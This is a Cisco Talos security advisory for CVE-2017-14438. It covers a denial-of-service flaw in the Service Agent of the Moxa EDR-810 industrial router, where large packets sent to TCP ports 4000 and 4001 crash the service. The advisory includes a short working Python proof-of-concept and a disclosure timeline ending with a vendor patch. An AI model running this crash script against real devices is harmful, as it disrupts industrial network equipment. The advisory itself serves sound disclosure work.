Headline
CVE-2017-14438: TALOS-2017-0487 || Cisco Talos Intelligence Group
Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability.
Summary
Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp and 4001/tcp to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
https://www.moxa.com/product/EDR-810.htm
CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE
CWE-20 - Improper Input Validation
Details
The Moxa EDR Service Agent listens on port 4000 (tcp/udp) and 4001 (tcp). Moxa MXconfig, a Windows program, interacts with the EDR via the ServiceAgent. Sending large amounts of random data to these ports causes a crash.
CVE-2017-14438 - Crash on Port 4000
In order to crash port 4000 (both TCP & UDP) a large packet needs to be sent to tcp/4000. This causes a consistent crash.
Port 4001
In order to crash port 4001 a large packet needs to be sent to tcp/4001. The crash does not always occur on the first try so an attacker may need to run this attack multiple times in order to cause a crash.
Exploit Proof-of-Concept
This python script will crash the Service Agent
import socket
host = '192.168.127.254'
port = 4000
packet = "\x00" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close
Timeline
2017-11-30 - Vendor Disclosure
2017-12-04 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Discovered by Patrick DeSantis and Carlos Pacho of Cisco Talos.